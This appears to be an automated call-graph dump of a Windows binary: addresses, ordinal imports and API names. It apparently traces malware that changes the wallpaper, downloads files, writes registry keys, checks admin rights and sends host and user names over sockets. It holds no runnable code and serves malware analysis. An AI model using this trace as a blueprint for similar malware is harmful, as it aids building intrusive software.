6258 406a54 #3089 6257->6258 6258->6256 6259 401600 6260 4016e5 6259->6260 6261 40161a 6259->6261 6262 4016e9 #537 6260->6262 6266 4016de 6260->6266 6263 40161d 6261->6263 6264 40168f 6261->6264 6282 401970 #3092 #6199 #800 6262->6282 6268 401743 #2385 6263->6268 6271 401628 #537 6263->6271 6272 40165e 6263->6272 6265 401693 #537 6264->6265 6264->6266 6281 401970 #3092 #6199 #800 6265->6281 6266->6268 6270 401701 SendMessageA #2385 6279 401970 #3092 #6199 #800 6271->6279 6272->6266 6275 401663 #537 6272->6275 6273 4016ab SendMessageA #2385 6280 401970 #3092 #6199 #800 6275->6280 6276 401640 #2385 6278 40167b #2385 6279->6276 6280->6278 6281->6273 6282->6270 6540 403f00 6545 403f20 #2414 6540->6545 6542 403f08 6543 403f18 6542->6543 6544 403f0f #825 6542->6544 6544->6543 6545->6542 5531 413102 __set_app_type __p__fmode __p__commode 5532 413171 5531->5532 5533 413185 5532->5533 5534 413179 __setusermatherr 5532->5534 5543 4133b2 _controlfp 5533->5543 5534->5533 5536 41318a _initterm __getmainargs _initterm 5537 4131de GetStartupInfoA 5536->5537 5539 413212 GetModuleHandleA 5537->5539 5544 4133e6 #1576 5539->5544 5542 413236 exit _XcptFilter 5543->5536 5544->5542 5872 404410 SetCursor 5864 403810 WideCharToMultiByte 5867 403e60 SendMessageA #3998 SendMessageA 5864->5867 5866 403845 5867->5866 5868 403410 #4476 5869 403454 #3089 5868->5869 5870 403431 5868->5870 5871 40343b 5869->5871 5870->5869 5870->5871 6129 401110 #2302 6546 404310 6547 404333 6546->6547 6548 40433a #470 #5789 #5875 #6172 6546->6548 6549 4044c0 7 API calls 6547->6549 6550 40438a #5789 #755 6548->6550 6549->6548 6551 401f10 6552 401f30 6 API calls 6551->6552 6553 401f18 6552->6553 6554 401f28 6553->6554 6555 401f1f #825 6553->6555 6555->6554 6289 40ca19 6290 40ca26 6289->6290 6291 40ca28 #823 6289->6291 6290->6291 6134 409920 6139 4098c0 6134->6139 6137 409938 6138 40992f #825 6138->6137 6140 4098f2 #5875 6139->6140 6141 4098fb 6139->6141 6140->6141 6141->6137 6141->6138 6301 405a20 6302 405a25 6301->6302 6305 4130bb 6302->6305 6308 41308f 6305->6308 6307 405a4a 6309 4130a4 __dllonexit 6308->6309 6310 413098 _onexit 6308->6310 6309->6307 6310->6307 5874 409c20 #3797 5875 409c40 #6734 5874->5875 5876 409c36 5874->5876 5877 409c5b SendMessageA 5875->5877 5878 409c78 5875->5878 5877->5878 5879 409ce4 5878->5879 5880 409caa 5878->5880 5881 409cf6 5879->5881 5882 409ce8 InvalidateRect 5879->5882 5883 409cd4 #4284 5880->5883 5884 409cc4 #4284 5880->5884 5882->5881 5883->5881 5884->5881 6292 401220 6293 4012c2 #2379 6292->6293 6294 401233 6292->6294 6295 401243 SendMessageA KillTimer #4853 6294->6295 6296 40126b SendMessageA 6294->6296 6295->6296 6297 401285 SendMessageA 6296->6297 6298 401297 6296->6298 6297->6298 6298->6293 6299 4012a1 SendMessageA 6298->6299 6299->6293 6300 4012b8 6299->6300 6300->6293 6319 404620 #795 6320 404638 6319->6320 6321 40462f #825 6319->6321 6321->6320 5873 40a020 TabbedTextOutA 5885 408c20 5890 408b40 5885->5890 5887 408c28 5888 408c38 5887->5888 5889 408c2f #825 5887->5889 5889->5888 5891 408bd0 5890->5891 5892 408b78 BitBlt 5890->5892 5894 408bd6 #2414 #640 5891->5894 5895 408bc1 #5785 5892->5895 5896 408bb5 #5785 5892->5896 5894->5887 5895->5894 5896->5894 6311 409a20 6316 4099c0 6311->6316 6314 409a38 6315 409a2f #825 6315->6314 6317 409a03 6316->6317 6318 4099f3 #6170 6316->6318 6317->6314 6317->6315 6318->6317 6560 409b20 6561 409b31 6560->6561 6562 409b33 #6140 6560->6562 6561->6562 5897 413427 5898 41342c 5897->5898 5901 4133fe #1168 5898->5901 5902 413421 5901->5902 5903 413418 _setmbcp 5901->5903 5903->5902 5907 407c30 OpenClipboard 5908 407c42 GlobalAlloc 5907->5908 5909 407ca9 5907->5909 5910 407c64 EmptyClipboard GlobalLock GlobalUnlock SetClipboardData CloseClipboard 5908->5910 5911 407c5b CloseClipboard 5908->5911 5910->5909 6143 402d30 6144 402d73 #825 6143->6144 6145 402d3f 6143->6145 6146 402d40 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N #825 6145->6146 6146->6146 6147 402d72 6146->6147 6147->6144 5904 40d830 inet_addr 5905 40d844 gethostbyname 5904->5905 5906 40d84f 5904->5906 5905->5906 5912 404430 5913 40447b 5912->5913 5914 40443d _TrackMouseEvent #2379 5912->5914 5917 404489 5913->5917 5919 404530 5913->5919 5918 4044a1 SetCursor #2379 5917->5918 5920 4045c1 5919->5920 5921 404552 5919->5921 5920->5917 5921->5920 5922 404559 #289 #5789 GetTextExtentPoint32A #5789 #613 5921->5922 5922->5920 6142 406930 #6215 6322 405230 6329 405369 6322->6329 6332 40525a 6322->6332 6323 405552 InvalidateRect 6328 405560 6323->6328 6324 405285 6325 4052ee 7 API calls 6324->6325 6326 40528f #4277 #923 #858 #800 #800 6324->6326 6325->6323 6326->6323 6327 40539e 6330 405430 6327->6330 6331 4053aa 7 API calls 6327->6331 6329->6323 6329->6327 6336 405390 #940 6329->6336 6333 4054b4 6330->6333 6334 405435 7 API calls 6330->6334 6331->6323 6332->6324 6335 405277 #940 6332->6335 6337 4054b8 6333->6337 6339 405503 6333->6339 6334->6323 6335->6324 6335->6335 6336->6327 6336->6336 6337->6323 6338 4054de #6778 #6648 6337->6338 6338->6338 6340 405501 6338->6340 6339->6323 6339->6328 6341 405529 #6778 #6648 6339->6341 6340->6323 6341->6323 6341->6341 6342 40d630 6347 40d650 6342->6347 6344 40d638 6345 40d648 6344->6345 6346 40d63f #825 6344->6346 6346->6345 6348 40dad0 4 API calls 6347->6348 6349 40d680 6348->6349 6349->6344 6148 402531 6149 402543 6148->6149 6150 40253c CloseHandle 6148->6150 6151 402555 6149->6151 6152 40254e CloseHandle 6149->6152 6150->6149 6152->6151 6350 40ca3a 6353 40ca40 6350->6353 6351 40ca81 6352 40ca87 #825 6352->6351 6353->6351 6353->6352 5923 4068c0 #4837 6354 4032c0 6 API calls 6355 403334 SendMessageA #3092 6354->6355 6357 40335c SendMessageA #3092 6355->6357 6359 40337b SendMessageA #3092 6357->6359 6361 4033a0 SendMessageA 6359->6361 6362 40339d 6359->6362 6365 403cb0 FindFirstFileA 6361->6365 6362->6361 6364 4033b2 SendMessageA #3996 SendMessageA 6366 403cd9 6365->6366 6367 403ce3 6365->6367 6366->6364 6368 403e1f FindNextFileA 6367->6368 6370 403d14 sscanf 6367->6370 6368->6367 6369 403e3a FindClose 6368->6369 6369->6364 6370->6368 6371 403d38 fopen 6370->6371 6371->6368 6372 403d5c fread 6371->6372 6373 403e15 fclose 6372->6373 6377 403d7b 6372->6377 6373->6368 6374 403d8f sprintf 6375 403dd4 SendMessageA #823 SendMessageA 6374->6375 6375->6373 6377->6373 6377->6374 6377->6375 6378 401c30 inet_ntoa 6377->6378 6378->6377 6563 4043c0 #6453 #2414 6564 409fc0 TextOutA 5924 404cd0 5929 404cf0 #2414 #2414 #800 #641 5924->5929 5926 404cd8 5927 404ce8 5926->5927 5928 404cdf #825 5926->5928 5928->5927 5929->5926 4642 4064d0 #4710 SendMessageA SendMessageA 4686 401c70 wcscat 4642->4686 4644 406516 4645 406577 4644->4645 4646 40651d GetModuleFileNameA strrchr 4644->4646 4695 401a10 4645->4695 4647 40656c SetCurrentDirectoryA 4646->4647 4648 40655d strrchr 4646->4648 4647->4645 4648->4647 4650 406585 4651 4065e5 4650->4651 4652 40658c time 4650->4652 4705 402c40 4651->4705 4653 401a10 5 API calls 4652->4653 4653->4651 4655 4065ed __p___argc 4656 406606 4655->4656 4657 40678c 4656->4657 4658 40660f __p___argv 4656->4658 4753 407e80 SHGetFolderPathW wcslen 4657->4753 4660 406621 4658->4660 4663 406661 __p___argv 4660->4663 4664 406652 4660->4664 4661 406793 SetWindowTextW 4756 406f80 4661->4756 4667 40666d 4663->4667 4724 407f80 fopen 4664->4724 4665 4067a9 4814 406c20 GetUserDefaultLangID GetLocaleInfoA 4665->4814 4671 4066ad __p___argv 4667->4671 4672 40669e 4667->4672 4670 4067b0 SetTimer SetTimer 4674 4066b9 4671->4674 4734 4080c0 FindFirstFileA 4672->4734 4674->4657 4676 4066ee Sleep 4674->4676 4711 401bb0 AllocateAndInitializeSid 4676->4711 4678 406734 4679 406750 sprintf 4678->4679 4680 406738 4678->4680 4716 401a90 CreateProcessA 4679->4716 4752 401b50 ShellExecuteExA 4680->4752 4683 40674b 4685 406784 ExitProcess 4683->4685 4684 406781 4684->4685 4688 401cdc 4686->4688 4687 401d00 RegCreateKeyW 4687->4688 4688->4687 4689 401d62 RegQueryValueExA 4688->4689 4690 401d1d GetCurrentDirectoryA RegSetValueExA 4688->4690 4691 401dbb 4688->4691 4692 401d9e RegCloseKey 4689->4692 4693 401d90 SetCurrentDirectoryA 4689->4693 4690->4692 4691->4644 4692->4688 4694 401dc8 4692->4694 4693->4692 4694->4644 4696 401a1a fopen 4695->4696 4698 401a3a 4696->4698 4699 401a6f 4696->4699 4700 401a53 fwrite 4698->4700 4701 401a46 fread 4698->4701 4699->4650 4702 401a5e 4700->4702 4701->4702 4703 401a74 fclose 4702->4703 4704 401a66 fclose 4702->4704 4703->4650 4704->4699 4823 404b70 4705->4823 4707 402c46 4708 402c57 4707->4708 4709 402c5e LoadLibraryA 4707->4709 4708->4655 4709->4708 4710 402c73 7 API calls 4709->4710 4710->4708 4712 401bf6 4711->4712 4713 401bfb CheckTokenMembership 4711->4713 4712->4678 4714 401c10 4713->4714 4715 401c14 FreeSid 4713->4715 4714->4715 4715->4678 4717 401b45 4716->4717 4718 401aed 4716->4718 4717->4684 4719 401af5 WaitForSingleObject 4718->4719 4720 401b26 CloseHandle CloseHandle 4718->4720 4721 401b12 4719->4721 4722 401b05 TerminateProcess 4719->4722 4720->4684 4721->4720 4723 401b1a GetExitCodeProcess 4721->4723 4722->4721 4723->4720 4725 407fd0 fread fclose 4724->4725 4733 406659 ExitProcess 4724->4733 4828 40be90 strncpy strncpy strncpy 4725->4828 4727 408002 4829 40c4f0 4727->4829 4729 40801d 4730 40c4f0 112 API calls 4729->4730 4731 408041 4729->4731 4730->4731 4732 401a10 5 API calls 4731->4732 4731->4733 4732->4733 4735 40820a 4734->4735 4747 408124 4734->4747 5288 401e30 4735->5288 4738 4081e4 FindNextFileA 4739 4081ff FindClose 4738->4739 4738->4747 4739->4735 4740 401e30 2 API calls 4742 408255 sprintf #537 4740->4742 4741 408158 sscanf 4741->4738 4743 408178 fopen 4741->4743 5293 4082c0 4742->5293 4743->4738 4745 408190 fread 4743->4745 4745->4747 4748 4081bd fclose 4745->4748 4747->4738 4747->4741 4747->4748 4748->4738 4748->4747 4749 408291 #537 4751 4082c0 141 API calls 4749->4751 4750 4066a5 ExitProcess 4751->4750 4752->4683 4754 407f02 4753->4754 4755 407f09 swprintf MultiByteToWideChar CopyFileW SystemParametersInfoW 4753->4755 4754->4661 4755->4661 5350 4076a0 4756->5350 4758 406fa8 27 API calls 4759 407119 4758->4759 4760 40711c SendMessageA #3092 4758->4760 4759->4760 4761 40713d SendMessageA #3092 4760->4761 4763 40715f SendMessageA #3092 4761->4763 4765 407181 SendMessageA #3092 4763->4765 4767 4071a3 SendMessageA #3092 4765->4767 4769 4071c5 SendMessageA #3092 4767->4769 4771 4071e7 4769->4771 4772 4071ea SendMessageA #3092 4769->4772 4771->4772 4773 407205 SendMessageA #3092 4772->4773 4775 407227 SendMessageA #3092 4773->4775 4777 407249 SendMessageA #3092 4775->4777 4779 40726b 4777->4779 4780 40726e SendMessageA #860 4777->4780 4779->4780 4781 4072a4 4780->4781 4782 4072ed #537 4781->4782 5366 404210 #858 #800 4782->5366 4784 407309 #537 5367 404210 #858 #800 4784->5367 4786 407325 #540 #2818 #535 5368 404210 #858 #800 4786->5368 4788 407369 5369 404270 4788->5369 4792 4073a8 SendMessageA SendMessageA #6140 #6140 4793 407428 4792->4793 5373 405920 4793->5373 4797 407457 5381 4058c0 4797->5381 4799 407460 5384 405180 _mbscmp 4799->5384 4801 407477 4802 405920 2 API calls 4801->4802 4803 4074ac 4802->4803 4804 405860 2 API calls 4803->4804 4805 4074b5 4804->4805 4806 4058c0 2 API calls 4805->4806 4807 4074be 4806->4807 4808 405180 4 API calls 4807->4808 4809 4074d5 GetTimeZoneInformation 4808->4809 5390 401e60 VariantTimeToSystemTime 4809->5390 4811 407508 SystemTimeToTzSpecificLocalTime #2818 5391 401e60 VariantTimeToSystemTime 4811->5391 4813 40759b SystemTimeToTzSpecificLocalTime #2818 #6334 #800 4813->4665 4815 406c81 SendMessageA 4814->4815 4816 406c5d 4814->4816 4817 406cc1 SendMessageA 4815->4817 4818 406ca1 SendMessageA 4815->4818 4816->4815 4820 406ae0 27 API calls 4817->4820 5398 406ae0 8 API calls 4818->5398 4821 406cdd 4820->4821 4821->4670 4822 406cba 4822->4670 4824 404b81 LoadLibraryA 4823->4824 4825 404b7a 4823->4825 4826 404b96 6 API calls 4824->4826 4827 404bf6 4824->4827 4825->4707 4826->4827 4827->4707 4828->4727 4830 40c50f 4829->4830 4843 40bed0 4830->4843 4832 40c54b 4833 40c596 4832->4833 4862 40dd00 4832->4862 4865 40dbf0 4833->4865 4836 40c5e7 4836->4729 4837 40c568 4837->4833 4838 40c600 4837->4838 4839 40c635 4838->4839 4840 40c617 strncpy 4838->4840 4841 40dbf0 free 4839->4841 4840->4839 4842 40c650 4841->4842 4842->4729 4844 40bef5 4843->4844 4845 40bf0a #823 4843->4845 4844->4845 4846 40bf2e 4845->4846 4847 40bf27 4845->4847 4849 40bf46 4846->4849 4873 40baf0 4846->4873 4869 40d5e0 4847->4869 4849->4832 4852 40bf72 4852->4832 4853 40bf8a GetComputerNameA GetUserNameA 4905 40dc00 4853->4905 4856 40dd00 4 API calls 4857 40c01f 4856->4857 4858 40dc00 4 API calls 4857->4858 4859 40c038 4858->4859 4860 40dd00 4 API calls 4859->4860 4861 40c047 4860->4861 4861->4832 4863 40dc00 4 API calls 4862->4863 4864 40dd1c 4863->4864 4864->4837 4866 40dd70 4865->4866 4867 40dd8b 4866->4867 5284 412ac0 4866->5284 4867->4836 4870 40d602 4869->4870 4914 40dad0 4870->4914 4917 40ba10 4873->4917 4875 40bdf5 4875->4852 4875->4853 4876 40bb14 4876->4875 4877 40bb42 4876->4877 4922 40ba60 4876->4922 4877->4875 4926 40c8f0 #823 4877->4926 4881 40bc1b strtok 4885 40bc30 4881->4885 4896 40bbb7 4881->4896 4882 40ba60 closesocket 4884 40bc8b 4882->4884 4886 40bc92 4884->4886 4887 40bcec GetTickCount srand 4884->4887 4885->4882 4885->4887 4948 40c860 4886->4948 4890 40bdc7 4887->4890 4891 40bd07 rand 4887->4891 4893 40c860 2 API calls 4890->4893 4901 40bd1e 4891->4901 4892 40bcd8 #825 4892->4875 4895 40bde8 #825 4893->4895 4895->4875 4896->4881 4898 40c7b0 #825 4896->4898 4928 40c7b0 4896->4928 4932 40c920 4896->4932 4944 40c800 #823 4896->4944 4897 40ba60 closesocket 4897->4901 4898->4881 4899 40be75 #825 4899->4875 4900 40be11 4900->4899 4960 40c740 4900->4960 4901->4897 4901->4900 4954 40ce50 4901->4954 4906 40dc15 4905->4906 4912 40c013 4905->4912 4907 40dc77 4906->4907 4908 40dc49 4906->4908 4906->4912 5283 412aa0 realloc 4907->5283 5282 412a90 malloc 4908->5282 4911 40dc51 4911->4912 4913 40dc8d ??0exception@@QAE@ABQBD _CxxThrowException 4911->4913 4912->4856 4913->4912 4915 40d61e 4914->4915 4916 40dadf setsockopt send shutdown closesocket 4914->4916 4915->4846 4916->4915 4918 40ba27 4917->4918 4919 40ba2b 4918->4919 4965 40b840 sprintf GetFileAttributesA 4918->4965 4919->4876 4921 40ba31 4921->4876 4923 40ba88 4922->4923 5218 40d8c0 4923->5218 4927 40bb62 strtok 4926->4927 4927->4885 4927->4896 4929 40c7d0 4928->4929 4930 40c7bb 4928->4930 4929->4896 4930->4929 4931 40c7d6 #825 4930->4931 4931->4929 4933 40c932 4932->4933 4934 40c92d ?_Xlen@std@ 4932->4934 4935 40c973 4933->4935 4936 40c963 4933->4936 4937 40c946 4933->4937 4934->4933 4940 40c990 4935->4940 4941 40c7b0 #825 4935->4941 4938 40c7b0 #825 4936->4938 4942 40c94a 4937->4942 5222 40c9c0 4937->5222 4939 40c96c 4938->4939 4939->4896 4940->4896 4941->4937 4942->4896 4945 40c81f 4944->4945 5228 40cad0 4945->5228 4947 40c844 4947->4896 4949 40c8d9 4948->4949 4951 40c870 4948->4951 4949->4892 4950 40c8ab #825 4950->4951 4953 40c8cc 4950->4953 4951->4950 4952 40c8a2 #825 4951->4952 4952->4950 4953->4892 4955 40ce68 4954->4955 4956 40ce5a 4954->4956 4958 40ce94 #825 4955->4958 4959 40bd9e #825 Sleep 4955->4959 4956->4955 4957 40ce6e #825 4956->4957 4957->4955 4958->4959 4959->4890 4959->4891 4961 40c761 4960->4961 4962 40c77e #825 4960->4962 4963 40c775 #825 4961->4963 4964 40c76f 4961->4964 4962->4900 4963->4962 4964->4962 4966 40b898 4965->4966 4967 40b95b CreateProcessA 4965->4967 4982 40b6a0 CreateDirectoryA 4966->4982 4969 40b9b4 4967->4969 4970 40b9bf WaitForSingleObject 4967->4970 4969->4921 4971 40b9e4 CloseHandle CloseHandle 4970->4971 4972 40b9d8 WaitForSingleObject 4970->4972 4971->4921 4972->4971 4973 40b8a9 4974 40b8e9 sprintf GetFileAttributesA 4973->4974 4996 40b780 CreateDirectoryA 4973->4996 4976 40b946 CopyFileA 4974->4976 4977 40b93b 4974->4977 4976->4967 4977->4921 4978 40b8c1 4978->4974 4979 40b780 60 API calls 4978->4979 4980 40b8d9 4979->4980 4980->4974 4981 40b8e0 4980->4981 4981->4921 5004 412920 4982->5004 4985 40b6d8 DeleteFileA 4985->4973 4986 40b6ec 5007 412940 4986->5007 4988 40b70e 4989 40b719 4988->4989 4990 40b76a 4988->4990 4992 412940 14 API calls 4988->4992 4989->4973 5016 412a00 4990->5016 4994 40b738 sprintf 4992->4994 4993 40b770 4993->4973 5013 4129e0 4994->5013 4997 40b81b 4996->4997 4998 40b7ae GetTempFileNameA DeleteUrlCacheEntry URLDownloadToFileA 4996->4998 4997->4978 4999 40b810 DeleteFileA 4998->4999 5000 40b7f6 4998->5000 4999->4997 5001 40b6a0 54 API calls 5000->5001 5002 40b809 5001->5002 5002->4999 5003 40b827 DeleteFileA 5002->5003 5003->4978 5027 4127e0 #823 5004->5027 5006 40b6cf 5006->4985 5006->4986 5008 412964 5007->5008 5009 412959 5007->5009 5010 412969 5008->5010 5053 411cf0 5008->5053 5009->4988 5010->4988 5012 412982 5012->4988 5143 412990 5013->5143 5015 4129f8 5015->4988 5017 412a15 5016->5017 5018 412a09 5016->5018 5019 412a1a 5017->5019 5205 4127a0 5017->5205 5018->4993 5019->4993 5022 412a7d #825 5022->4993 5023 412a44 #825 5024 412a4d 5023->5024 5025 412a61 #825 5024->5025 5026 412a6a #825 5024->5026 5025->5026 5026->5022 5028 412815 5027->5028 5029 41287a 5027->5029 5028->5029 5030 41283d #823 5028->5030 5040 411c00 5029->5040 5030->5029 5032 41289d 5033 4128a6 5032->5033 5034 4128f8 #823 5032->5034 5035 4128e5 5033->5035 5036 4128b4 #825 5033->5036 5037 4128bd 5033->5037 5034->5006 5035->5006 5036->5037 5038 4128d6 #825 5037->5038 5039 4128cd #825 5037->5039 5038->5035 5039->5038 5041 411c10 5040->5041 5042 411ce2 5040->5042 5041->5042 5043 411c1a GetCurrentDirectoryA 5041->5043 5042->5032 5044 411c45 5043->5044 5045 411c80 SetFilePointer 5044->5045 5046 411c9e 5044->5046 5045->5046 5047 411c92 5045->5047 5048 4108a0 CreateFileA SetFilePointer #823 SetFilePointer 5046->5048 5047->5032 5049 411caf 5048->5049 5050 411cb6 5049->5050 5051 410dc0 9 API calls 5049->5051 5050->5032 5052 411cc7 5051->5052 5052->5032 5054 412231 5053->5054 5055 411d11 5053->5055 5054->5012 5055->5054 5059 411d27 5055->5059 5086 411ac0 5055->5086 5057 411d37 5057->5012 5058 411dc2 5061 411ddc 5058->5061 5098 4113e0 5058->5098 5059->5057 5059->5058 5093 411390 5059->5093 5104 411350 5061->5104 5066 411e15 5067 411e1c 5066->5067 5131 410a50 5066->5131 5067->5012 5069 411e3e 5070 411e45 5069->5070 5071 411e56 #823 5069->5071 5070->5012 5138 410af0 5071->5138 5073 411e78 5074 411e83 #825 5073->5074 5075 411e9d _mbsstr 5073->5075 5074->5012 5077 411f15 _mbsstr 5075->5077 5077->5075 5078 411f2c _mbsstr 5077->5078 5078->5075 5079 411f43 _mbsstr 5078->5079 5079->5075 5080 411f5a 5079->5080 5142 411b80 SystemTimeToFileTime 5080->5142 5082 412063 LocalFileTimeToFileTime 5085 4120b6 5082->5085 5083 412203 5083->5012 5084 4121fa #825 5084->5083 5085->5083 5085->5084 5087 411acd 5086->5087 5089 411ad6 5086->5089 5087->5059 5088 411add 5088->5059 5089->5088 5090 411b02 free 5089->5090 5092 411b11 5089->5092 5090->5092 5091 411b2a free 5091->5059 5092->5091 5094 4113a0 5093->5094 5095 411399 5093->5095 5096 411000 SetFilePointer SetFilePointer ReadFile 5094->5096 5095->5058 5097 4113c7 5096->5097 5097->5058 5099 4113f0 5098->5099 5100 4113e9 5098->5100 5101 4113f7 5099->5101 5102 411000 SetFilePointer SetFilePointer ReadFile 5099->5102 5100->5058 5101->5058 5103 411444 5102->5103 5103->5058 5105 411000 SetFilePointer SetFilePointer ReadFile 5104->5105 5106 41137f 5105->5106 5107 411460 5106->5107 5108 410a50 SetFilePointer SetFilePointer 5107->5108 5109 411491 5108->5109 5110 411498 5109->5110 5111 410c00 ReadFile 5109->5111 5110->5066 5112 4114af 5111->5112 5113 410bb0 ReadFile 5112->5113 5114 4114d7 5113->5114 5115 410bb0 ReadFile 5114->5115 5116 4114ee 5115->5116 5117 410bb0 ReadFile 5116->5117 5118 411505 5117->5118 5119 410c00 ReadFile 5118->5119 5120 41153b 5119->5120 5121 410c00 ReadFile 5120->5121 5122 411552 5121->5122 5123 410c00 ReadFile 5122->5123 5125 411586 5123->5125 5124 410c00 ReadFile 5126 4115ba 5124->5126 5125->5124 5127 410bb0 ReadFile 5126->5127 5129 4115ee 5127->5129 5128 410bb0 ReadFile 5130 411621 5128->5130 5129->5128 5130->5066 5132 410a5a 5131->5132 5135 410aaa 5131->5135 5133 410a82 5132->5133 5134 410a69 SetFilePointer 5132->5134 5132->5135 5136 410aa4 5133->5136 5137 410a90 SetFilePointer 5133->5137 5134->5069 5135->5069 5136->5069 5137->5069 5139 410b31 5138->5139 5140 410b07 ReadFile 5138->5140 5139->5073 5141 410b22 5140->5141 5141->5073 5142->5082 5144 4129a3 5143->5144 5145 412998 5143->5145 5146 4129a8 5144->5146 5149 412360 5144->5149 5145->5015 5146->5015 5148 4129cf 5148->5015 5150 412378 5149->5150 5151 41239c 5149->5151 5155 4124ab 5150->5155 5156 41238a 5150->5156 5161 411ac0 free free 5150->5161 5152 41240e 5151->5152 5153 4123b7 5151->5153 5158 411ac0 free free 5151->5158 5154 411810 SetFilePointer SetFilePointer ReadFile 5152->5154 5160 4123c8 5153->5160 5164 4123e5 5153->5164 5168 411390 SetFilePointer SetFilePointer ReadFile 5153->5168 5159 412431 5154->5159 5157 4124bf 5155->5157 5162 4124dc 5155->5162 5165 411390 SetFilePointer SetFilePointer ReadFile 5155->5165 5156->5148 5157->5148 5158->5153 5163 412442 5159->5163 5166 411ac0 free free 5159->5166 5160->5148 5161->5155 5167 4124f6 5162->5167 5170 4113e0 SetFilePointer SetFilePointer ReadFile 5162->5170 5163->5148 5169 4123ff 5164->5169 5172 4113e0 SetFilePointer SetFilePointer ReadFile 5164->5172 5165->5162 5166->5163 5171 411cf0 14 API calls 5167->5171 5168->5164 5173 411660 8 API calls 5169->5173 5170->5162 5174 412506 5171->5174 5172->5164 5173->5152 5175 412578 5174->5175 5179 412510 5174->5179 5176 41257d 5175->5176 5180 4125da 5175->5180 5185 4125df wsprintfA 5175->5185 5187 412671 wsprintfA 5175->5187 5182 412637 5176->5182 5183 411660 8 API calls 5176->5183 5177 412515 5177->5148 5178 41253f 5181 412250 GetFileAttributesA CreateDirectoryA GetFileAttributesA CreateDirectoryA 5178->5181 5179->5177 5179->5178 5184 412559 5179->5184 5180->5185 5186 412547 5181->5186 5182->5148 5188 4126ad 5183->5188 5190 412250 GetFileAttributesA CreateDirectoryA GetFileAttributesA CreateDirectoryA 5184->5190 5189 412250 GetFileAttributesA CreateDirectoryA GetFileAttributesA CreateDirectoryA 5185->5189 5186->5148 5191 412250 GetFileAttributesA CreateDirectoryA GetFileAttributesA CreateDirectoryA 5187->5191 5192 4126ba #823 5188->5192 5201 4126cd 5188->5201 5193 41260a CreateFileA 5189->5193 5194 412566 5190->5194 5191->5193 5192->5201 5193->5176 5194->5148 5196 411810 SetFilePointer SetFilePointer ReadFile 5196->5201 5197 412728 5198 412776 5197->5198 5199 41276f CloseHandle 5197->5199 5202 411ac0 free free 5198->5202 5199->5198 5200 412704 WriteFile 5200->5197 5200->5201 5201->5196 5201->5197 5201->5200 5203 412746 SetFileTime 5201->5203 5204 41277e 5202->5204 5203->5197 5204->5148 5206 4127b1 5205->5206 5207 4127a9 5205->5207 5209 4127c7 5206->5209 5211 410f70 5206->5211 5208 411ac0 2 API calls 5207->5208 5208->5206 5209->5022 5209->5023 5209->5024 5212 410f80 5211->5212 5213 410f79 5211->5213 5214 410f8d 5212->5214 5215 411ac0 free free 5212->5215 5213->5209 5216 4109c0 CloseHandle #825 5214->5216 5215->5214 5217 410f98 free 5216->5217 5217->5209 5220 40d8ec 5218->5220 5219 40daad closesocket 5221 40baa8 5219->5221 5220->5219 5220->5221 5221->4877 5223 40c9f6 #823 5222->5223 5227 40ca40 5223->5227 5225 40ca81 5225->4940 5226 40ca87 #825 5226->5225 5227->5225 5227->5226 5229 40cbf3 5228->5229 5230 40cb00 5228->5230 5229->4947 5231 40cb26 5230->5231 5237 40cb90 5230->5237 5232 40cb31 5231->5232 5233 40cb2c ?_Xran@std@ 5231->5233 5247 40cd80 5232->5247 5233->5232 5234 40cbe9 5236 40cc60 5 API calls 5234->5236 5236->5229 5237->5234 5239 40cbaa 5237->5239 5238 40cb38 5241 40cb6a 5238->5241 5242 40cb47 memmove 5238->5242 5240 40c7b0 #825 5239->5240 5243 40cbb3 5240->5243 5245 40cd80 4 API calls 5241->5245 5264 40cc60 5242->5264 5243->4947 5246 40cb7d 5245->5246 5246->4947 5248 40cd93 5247->5248 5249 40ce27 5247->5249 5248->5249 5250 40cdd0 5248->5250 5251 40cdc9 ?_Xlen@std@ 5248->5251 5249->5238 5252 40cdf8 5250->5252 5255 40cde2 5250->5255 5251->5250 5253 40ce0a 5252->5253 5254 40cdfc 5252->5254 5253->5249 5260 40c7b0 #825 5253->5260 5256 40c7b0 #825 5254->5256 5257 40cde6 5255->5257 5258 40ce1f 5255->5258 5259 40ce05 5256->5259 5261 40c7b0 #825 5257->5261 5262 40c9c0 2 API calls 5258->5262 5259->5238 5260->5258 5263 40cdf3 5261->5263 5262->5249 5263->5238 5265 40cc73 5264->5265 5266 40cc6e ?_Xlen@std@ 5264->5266 5267 40cd04 5265->5267 5268 40cc88 5265->5268 5269 40ccae 5265->5269 5266->5265 5267->5268 5274 40cd08 5267->5274 5270 40cc90 5268->5270 5273 40c9c0 2 API calls 5268->5273 5272 40ccd9 #825 5269->5272 5276 40ccc4 5269->5276 5270->5241 5271 40cd4c 5277 40c9c0 2 API calls 5271->5277 5272->5276 5273->5270 5274->5270 5274->5271 5275 40cd43 #825 5274->5275 5278 40cd26 5274->5278 5275->5271 5276->5241 5279 40cd5d 5277->5279 5280 40c9c0 2 API calls 5278->5280 5279->5241 5281 40cd3b 5280->5281 5281->5241 5282->4911 5283->4911 5285 412af5 5284->5285 5286 412ac8 free 5284->5286 5285->4867 5286->5285 5320 401e60 VariantTimeToSystemTime 5288->5320 5290 401e42 5321 401de0 sprintf 5290->5321 5292 401e51 5292->4740 5294 408337 5293->5294 5295 4082fb #4278 #858 #800 5293->5295 5296 408344 5294->5296 5297 408378 time 5294->5297 5295->5294 5298 408359 #800 5296->5298 5299 40834d #1200 5296->5299 5300 40839c 5297->5300 5301 40844d time 5297->5301 5302 40828c 5298->5302 5299->5298 5300->5301 5303 4083a9 5300->5303 5301->5303 5304 408466 5301->5304 5302->4749 5302->4750 5305 4083bb 5303->5305 5306 40846c fopen 5303->5306 5304->5306 5307 4083c4 #540 time #2818 #1200 #800 5305->5307 5308 40842e #800 5305->5308 5309 4084b5 fread fclose 5306->5309 5310 408496 #800 5306->5310 5307->5308 5308->5302 5322 40be90 strncpy strncpy strncpy 5309->5322 5310->5302 5312 4084e7 5323 40c060 5312->5323 5314 408501 5315 408516 5314->5315 5316 408538 5314->5316 5317 408549 #800 5315->5317 5318 40851a #1200 time 5315->5318 5316->5317 5319 40853c #1200 5316->5319 5317->5302 5318->5317 5319->5317 5320->5290 5321->5292 5322->5312 5324 40c07f 5323->5324 5325 40bed0 110 API calls 5324->5325 5326 40c0ba 5325->5326 5327 40c0c1 5326->5327 5328 40c0e7 5326->5328 5329 40c0cc SendMessageA 5327->5329 5347 40c0db 5327->5347 5330 40c104 5328->5330 5331 40c0f8 SendMessageA 5328->5331 5329->5347 5332 40dd00 4 API calls 5330->5332 5331->5330 5335 40c116 5332->5335 5333 